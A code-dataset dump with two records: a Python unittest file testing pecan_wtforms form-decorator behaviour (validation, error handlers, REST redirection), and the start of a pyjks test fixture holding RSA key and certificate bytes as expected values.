hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
628bf9df2a0725401c00ac651585961fafd42c72
| 23,546
|
py
|
Python
|
pecan_wtforms/tests/test_decorator.py
|
ryanpetrello/pecan-wtforms
|
5f83e904c1a9fd157029aa3486c993e93272a013
|
[
"BSD-3-Clause"
] | null | null | null |
pecan_wtforms/tests/test_decorator.py
|
ryanpetrello/pecan-wtforms
|
5f83e904c1a9fd157029aa3486c993e93272a013
|
[
"BSD-3-Clause"
] | null | null | null |
pecan_wtforms/tests/test_decorator.py
|
ryanpetrello/pecan-wtforms
|
5f83e904c1a9fd157029aa3486c993e93272a013
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from unittest import TestCase
class TestIdempotentFormWrapper(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose()
@pecan_wtforms.with_form(SimpleForm)
def index(self):
return 'Hello, World!'
@expose('name.html')
@pecan_wtforms.with_form(SimpleForm)
def name(self):
return dict()
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(Pecan(
RootController(),
template_path=template_path
))
def test_request_injection(self):
response = self.app.get('/')
assert response.body == 'Hello, World!'
assert response.namespace == 'Hello, World!'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
def test_template_namespace_injection(self):
response = self.app.get('/name')
form = self.formcls_()
assert 'form' in response.namespace
assert isinstance(response.namespace['form'], self.formcls_)
assert str(form.first_name.label) in response.body
assert str(form.first_name) in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
class TestIdempotentFormWrapperWithCustomKey(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose()
@pecan_wtforms.with_form(SimpleForm, key='some_form')
def index(self):
return 'Hello, World!'
@expose('name_with_custom_key.html')
@pecan_wtforms.with_form(SimpleForm, key='some_form')
def name(self):
return dict()
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(Pecan(
RootController(),
template_path=template_path
))
def test_request_injection(self):
response = self.app.get('/')
assert response.body == 'Hello, World!'
assert response.namespace == 'Hello, World!'
assert 'some_form' in response.request.pecan
assert isinstance(response.request.pecan['some_form'], self.formcls_)
def test_template_namespace_injection(self):
response = self.app.get('/name')
form = self.formcls_()
assert 'some_form' in response.namespace
assert isinstance(response.namespace['some_form'], self.formcls_)
assert str(form.first_name.label) in response.body
assert str(form.first_name) in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
class TestWrapperValidation(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose()
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
return '%s %s' % (
kw.get('first_name', ''),
kw.get('last_name', '')
)
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(Pecan(
RootController(),
template_path=template_path
))
def test_no_errors(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
'last_name': 'Petrello'
})
assert response.body == 'Ryan Petrello'
assert response.namespace == 'Ryan Petrello'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {}
def test_with_errors(self):
response = self.app.post('/', params={})
assert response.body == 'None None'
assert response.namespace == 'None None'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'first_name': ['This field is required.'],
'last_name': ['This field is required.']
}
class TestWrapperValidationWithGETMethod(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose()
@pecan_wtforms.with_form(SimpleForm, validate_safe=True)
def index(self, **kw):
print kw
return '%s %s' % (
kw.get('first_name', ''),
kw.get('last_name', '')
)
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(Pecan(
RootController(),
template_path=template_path
))
def test_no_errors(self):
response = self.app.get('/?first_name=Ryan&last_name=Petrello')
assert response.body == 'Ryan Petrello'
assert response.namespace == 'Ryan Petrello'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {}
def test_with_errors(self):
response = self.app.get('/')
assert response.body == 'None None'
assert response.namespace == 'None None'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'first_name': ['This field is required.'],
'last_name': ['This field is required.']
}
class TestValidatorCoercion(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
age = pecan_wtforms.fields.IntegerField("Age")
self.formcls_ = SimpleForm
class RootController(object):
@expose()
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
assert type(kw['age']) is int
return str(kw['age'])
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(Pecan(
RootController(),
template_path=template_path
))
def test_int_conversion_by_validator(self):
response = self.app.post('/', params={
'age': '30'
})
assert response.body == '30'
assert response.namespace == '30'
assert response.request.pecan['form'].errors == {}
class TestCustomHandler(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from pecan.middleware.recursive import RecursiveMiddleware
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose('name.html')
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
return dict()
@expose()
@pecan_wtforms.with_form(SimpleForm, error_cfg={'handler': '/'})
def save(self, **kw):
return 'SAVED!'
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(RecursiveMiddleware(Pecan(
RootController(),
template_path=template_path
)))
def test_no_errors(self):
response = self.app.post('/save', params={
'first_name': 'Ryan',
'last_name': 'Petrello'
})
assert response.body == 'SAVED!'
assert response.namespace == 'SAVED!'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {}
def test_custom_error_handler(self):
response = self.app.post('/save', params={
'first_name': 'Ryan',
})
form = self.formcls_()
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'last_name': [u'This field is required.']
}
class TestGenericHandler(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose
from pecan.middleware.recursive import RecursiveMiddleware
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose(generic=True, template='name.html')
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
return dict()
@index.when(method='POST')
@pecan_wtforms.with_form(SimpleForm, error_cfg={'handler': '/'})
def save(self, **kw):
return 'SAVED!'
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(RecursiveMiddleware(Pecan(
RootController(),
template_path=template_path
)))
def test_no_errors(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
'last_name': 'Petrello'
})
assert response.body == 'SAVED!'
assert response.namespace == 'SAVED!'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {}
def test_custom_error_handler(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
})
form = self.formcls_()
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'last_name': [u'This field is required.']
}
class TestCallableHandler(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose, request
from pecan.middleware.recursive import RecursiveMiddleware
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose(generic=True, template='name.html')
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
return dict()
@index.when(method='POST')
@pecan_wtforms.with_form(
SimpleForm,
error_cfg={'handler': lambda: request.path}
)
def save(self, **kw):
return 'SAVED!'
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(RecursiveMiddleware(Pecan(
RootController(),
template_path=template_path
)))
def test_no_errors(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
'last_name': 'Petrello'
})
assert response.body == 'SAVED!'
assert response.namespace == 'SAVED!'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {}
def test_custom_error_handler(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
})
form = self.formcls_()
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'last_name': [u'This field is required.']
}
class TestErrorFillFromRequestArgs(TestCase):
"""
If a form is submitted and handled by a callable `handler`,
the `populate()` method should enforce values sent in the original request
(generally, request.POST).
"""
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose, request
from pecan.middleware.recursive import RecursiveMiddleware
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose(generic=True, template='name.html')
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
request.pecan['form'].process(first_name='Ryan')
return dict()
@index.when(method='POST')
@pecan_wtforms.with_form(
SimpleForm,
error_cfg={'handler': lambda: request.path}
)
def save(self, **kw):
return 'SAVED!'
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(RecursiveMiddleware(Pecan(
RootController(),
template_path=template_path
)))
def test_no_errors(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
'last_name': 'Petrello'
})
assert response.body == 'SAVED!'
assert response.namespace == 'SAVED!'
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {}
def test_default_prefill(self):
response = self.app.get('/')
form = self.formcls_()
assert 'form' in response.request.pecan
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') in response.body
def test_error_fill(self):
response = self.app.post('/', params={
'first_name': '',
'last_name': 'Petrello'
})
form = self.formcls_()
assert 'form' in response.request.pecan
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') not in response.body
assert form.first_name(value='') in response.body
class TestAutoErrorMarkup(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose, request
from pecan.middleware.recursive import RecursiveMiddleware
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(object):
@expose(generic=True, template='name.html')
@pecan_wtforms.with_form(SimpleForm)
def index(self, **kw):
return dict()
@index.when(method='POST')
@pecan_wtforms.with_form(
SimpleForm,
error_cfg={
'handler': lambda: request.path,
'auto_insert_errors': True
}
)
def save(self, **kw):
return 'SAVED!' # pragma: nocover
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(RecursiveMiddleware(Pecan(
RootController(),
template_path=template_path
)))
def test_custom_error_handler(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
})
assert ''.join([
'<label for="last_name">Last Name</label>: ',
'<span class="error-message">This field is required.</span>\n',
('<input class="error" id="last_name" name="last_name" type="text"'
' value="">')
]) in response.body
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'last_name': [u'This field is required.']
}
class TestRESTControllerHandler(TestCase):
def setUp(self):
import pecan_wtforms
from pecan import Pecan, expose, request
from pecan.rest import RestController
from pecan.middleware.recursive import RecursiveMiddleware
from webtest import TestApp
class SimpleForm(pecan_wtforms.form.Form):
first_name = pecan_wtforms.fields.TextField(
"First Name",
[pecan_wtforms.validators.Required()]
)
last_name = pecan_wtforms.fields.TextField(
"Last Name",
[pecan_wtforms.validators.Required()]
)
self.formcls_ = SimpleForm
class RootController(RestController):
@expose('name.html')
@pecan_wtforms.with_form(SimpleForm)
def get_all(self, **kw):
return dict()
@expose()
@pecan_wtforms.with_form(
SimpleForm,
error_cfg={'handler': lambda: request.path}
)
def post(self, **kw):
return 'SAVED!' # pragma: nocover
template_path = os.path.join(
os.path.dirname(__file__),
'templates'
)
self.app = TestApp(RecursiveMiddleware(Pecan(
RootController(),
template_path=template_path
)))
def test_rest_redirection(self):
response = self.app.post('/', params={
'first_name': 'Ryan',
})
form = self.formcls_()
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'last_name': [u'This field is required.']
}
def test_rest_redirection_with_method_param(self):
response = self.app.post('/?_method=POST', params={
'first_name': 'Ryan',
})
form = self.formcls_()
assert str(form.first_name.label) in response.body
assert form.first_name(value='Ryan') in response.body
assert str(form.last_name.label) in response.body
assert str(form.last_name) in response.body
assert 'form' in response.request.pecan
assert isinstance(response.request.pecan['form'], self.formcls_)
assert response.request.pecan['form'].errors == {
'last_name': [u'This field is required.']
}
| 32.839609
| 79
| 0.573686
| 2,369
| 23,546
| 5.541579
| 0.058675
| 0.074954
| 0.07465
| 0.054845
| 0.923294
| 0.919257
| 0.913239
| 0.912477
| 0.894043
| 0.882922
| 0
| 0.000374
| 0.318823
| 23,546
| 716
| 80
| 32.885475
| 0.818131
| 0.001317
| 0
| 0.829604
| 0
| 0
| 0.081708
| 0.00373
| 0
| 0
| 0
| 0
| 0.189329
| 0
| null | null | 0
| 0.072289
| null | null | 0.001721
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6575a74490c2926b00effa2a6ddb7b345d5dd000
| 5,749
|
py
|
Python
|
tests/expected/bks_custom_entry_passwords.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 92
|
2016-10-03T07:54:39.000Z
|
2022-03-29T00:38:45.000Z
|
tests/expected/bks_custom_entry_passwords.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 46
|
2016-09-09T03:13:40.000Z
|
2022-03-10T22:54:12.000Z
|
tests/expected/bks_custom_entry_passwords.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 30
|
2016-10-07T16:12:11.000Z
|
2022-02-04T21:34:03.000Z
|
public_key = b"\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xd9\x7a\xcd" + \
b"\x72\x88\xaa\x98\x10\xee\x43\x50\x98\x95\x42\x98\x2d\x4d\xd7\x2c\xd6\x49\x9d\x4e\x37\x97\x53\x7a\xd3\x94\x8c\x93\x70\x22\xf1\x00" + \
b"\x4b\x4a\x46\xca\xfc\x9c\xa5\x87\xa1\x90\x68\xb9\x04\x79\x1d\x6a\x20\x31\xa2\xe9\x2c\xb1\x51\xb9\x53\xce\x58\x5f\x9c\xd2\xfc\x41" + \
b"\x24\x98\xed\x9e\x0c\x37\xc2\xab\x45\xfc\xbe\x11\x8b\x68\xc0\x4d\xb0\x0c\xb3\xea\x72\x19\xb7\x81\xa8\x3d\x4e\xb0\x59\xb2\xa7\xab" + \
b"\x2d\xac\xd1\xaf\xae\x77\x12\xd3\x30\x97\x28\xd5\xe7\x88\x34\x35\x10\x66\x45\x52\x5f\xea\xfb\x02\x9b\x75\x5c\x77\x67\x02\x03\x01" + \
b"\x00\x01"
private_key = b"\x30\x82\x02\x75\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x04\x82\x02\x5f\x30\x82\x02\x5b\x02\x01" + \
b"\x00\x02\x81\x81\x00\xd9\x7a\xcd\x72\x88\xaa\x98\x10\xee\x43\x50\x98\x95\x42\x98\x2d\x4d\xd7\x2c\xd6\x49\x9d\x4e\x37\x97\x53\x7a" + \
b"\xd3\x94\x8c\x93\x70\x22\xf1\x00\x4b\x4a\x46\xca\xfc\x9c\xa5\x87\xa1\x90\x68\xb9\x04\x79\x1d\x6a\x20\x31\xa2\xe9\x2c\xb1\x51\xb9" + \
b"\x53\xce\x58\x5f\x9c\xd2\xfc\x41\x24\x98\xed\x9e\x0c\x37\xc2\xab\x45\xfc\xbe\x11\x8b\x68\xc0\x4d\xb0\x0c\xb3\xea\x72\x19\xb7\x81" + \
b"\xa8\x3d\x4e\xb0\x59\xb2\xa7\xab\x2d\xac\xd1\xaf\xae\x77\x12\xd3\x30\x97\x28\xd5\xe7\x88\x34\x35\x10\x66\x45\x52\x5f\xea\xfb\x02" + \
b"\x9b\x75\x5c\x77\x67\x02\x03\x01\x00\x01\x02\x81\x80\x29\xf4\xde\x98\xe7\x93\xdd\xd5\x7a\x5a\x03\x3d\x04\xa2\xbd\xe0\x13\xa1\xdd" + \
b"\x15\x14\x4b\xa4\x50\xe6\x41\x65\x33\x57\x77\xcd\x63\xf7\x61\xbe\x58\x48\x22\xa3\x3b\x9b\xee\xf5\x5d\x2e\x92\x7d\x8b\x46\xe0\x6d" + \
b"\x5e\x7b\xa4\xfd\xce\x31\x01\x5e\xbb\x33\xd6\x69\xcf\x68\xc0\x15\x60\x99\xb6\x33\x6a\x59\x86\xe0\xd2\x62\x11\x76\x0c\xe9\x0c\x53" + \
b"\xa4\xa0\x24\x98\xeb\xfd\x05\xa7\x4f\xb1\xbc\xc9\x11\xc2\xdb\xbf\x55\xcd\x4e\x8a\x3f\x46\xb8\xf9\x55\x8c\xe8\x22\xda\xb2\x67\xf0" + \
b"\x71\xe2\xe0\x77\xa8\x00\x9d\x4e\x34\xcd\xdd\x77\x99\x02\x41\x00\xfd\x78\x72\x13\x37\x8d\xcb\x6b\x92\x52\x82\x12\x65\x60\x7b\x8a" + \
b"\xc4\x7a\x5e\xd4\xb8\x1a\xfa\x7f\x5e\xf8\x8a\x84\xf8\x1b\x7c\x28\xfc\x38\x74\xa0\x2e\x44\xc2\x13\x72\x05\xbd\x31\x49\xb9\xb1\x2d" + \
b"\x7a\xf1\x76\x25\x11\x09\xf9\x19\xdd\x02\xfa\xeb\x66\x06\x85\x59\x02\x41\x00\xdb\xa6\x68\xcb\x33\x55\xdb\xbf\x7e\x9b\xdb\xb5\x76" + \
b"\x1a\x1b\xca\x75\x0d\x12\xf2\xf1\x85\x87\x58\xf8\x7c\xee\x6c\x9d\xb9\x06\x1d\xb3\x9e\xad\xf8\xc8\x84\x9d\x8c\xe8\x65\x50\x42\x56" + \
b"\x56\xdc\x81\xd1\xad\xf5\xa9\x7d\xd2\x2e\xa7\x34\xfd\x63\x9e\x9a\xe5\x8a\xbf\x02\x40\x1d\x56\xed\xcd\x6f\xa6\xc8\x1f\x21\x86\xcf" + \
b"\x6b\x95\xb4\x7f\x58\x66\xb9\xcb\x74\x50\x03\x3f\x6f\xb2\xec\x8e\x0c\x2a\x33\xf4\x41\x42\x40\xbe\xaf\x33\xeb\xdd\x93\x26\xa5\xa7" + \
b"\x6a\xa7\x20\x09\x74\x3c\x40\xea\xee\x0b\x74\xde\x12\xb2\x54\x7f\xfa\xf3\x8a\x59\xb1\x02\x40\x5a\xaa\x7a\x1f\x46\x75\x6e\x5b\xc1" + \
b"\x3b\x3c\x99\xce\xc2\x40\x2e\x75\xda\x8b\xb3\xd4\x96\x35\xa4\x38\x0d\xf9\xac\xc3\xfe\x17\xd4\x32\xcc\x91\x2b\x5c\x39\xc1\x7e\xe4" + \
b"\x7e\xcd\x7e\x54\x7d\x4e\x50\x17\xe9\x22\xba\x6f\xc1\x4e\x98\x9e\x7a\xe9\xa0\x12\x78\x25\xa9\x02\x40\x0b\xff\x66\xb9\xf1\x6d\x18" + \
b"\xd9\x92\x64\x60\x16\x04\xdc\x39\x06\x56\xd5\xc9\x9c\x0c\x9b\x66\x06\x35\xf8\xd8\xa0\xa4\xff\xb4\x02\x9c\xaf\xb6\xab\x9a\xc0\x29" + \
b"\xb2\x17\x33\xac\x83\x10\x8c\x4c\x89\x44\x3e\xd0\x1e\x11\x61\x4a\xf5\xe3\xca\x26\x28\x38\x43\x7d\xeb"
certs = [b"\x30\x82\x01\xb8\x30\x82\x01\x21\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x22\x31\x20\x30\x1e\x06\x03\x55\x04\x03\x0c\x17\x63\x75\x73\x74\x6f\x6d\x5f\x65\x6e\x74\x72\x79\x5f\x70\x61\x73\x73\x77\x6f\x72" + \
b"\x64\x73\x31\x30\x1e\x17\x0d\x31\x36\x30\x35\x31\x38\x32\x32\x35\x33\x30\x36\x5a\x17\x0d\x31\x38\x30\x35\x31\x38\x32\x32\x35\x33" + \
b"\x30\x36\x5a\x30\x22\x31\x20\x30\x1e\x06\x03\x55\x04\x03\x0c\x17\x63\x75\x73\x74\x6f\x6d\x5f\x65\x6e\x74\x72\x79\x5f\x70\x61\x73" + \
b"\x73\x77\x6f\x72\x64\x73\x31\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x81\x8d\x00\x30\x81\x89" + \
b"\x02\x81\x81\x00\xd9\x7a\xcd\x72\x88\xaa\x98\x10\xee\x43\x50\x98\x95\x42\x98\x2d\x4d\xd7\x2c\xd6\x49\x9d\x4e\x37\x97\x53\x7a\xd3" + \
b"\x94\x8c\x93\x70\x22\xf1\x00\x4b\x4a\x46\xca\xfc\x9c\xa5\x87\xa1\x90\x68\xb9\x04\x79\x1d\x6a\x20\x31\xa2\xe9\x2c\xb1\x51\xb9\x53" + \
b"\xce\x58\x5f\x9c\xd2\xfc\x41\x24\x98\xed\x9e\x0c\x37\xc2\xab\x45\xfc\xbe\x11\x8b\x68\xc0\x4d\xb0\x0c\xb3\xea\x72\x19\xb7\x81\xa8" + \
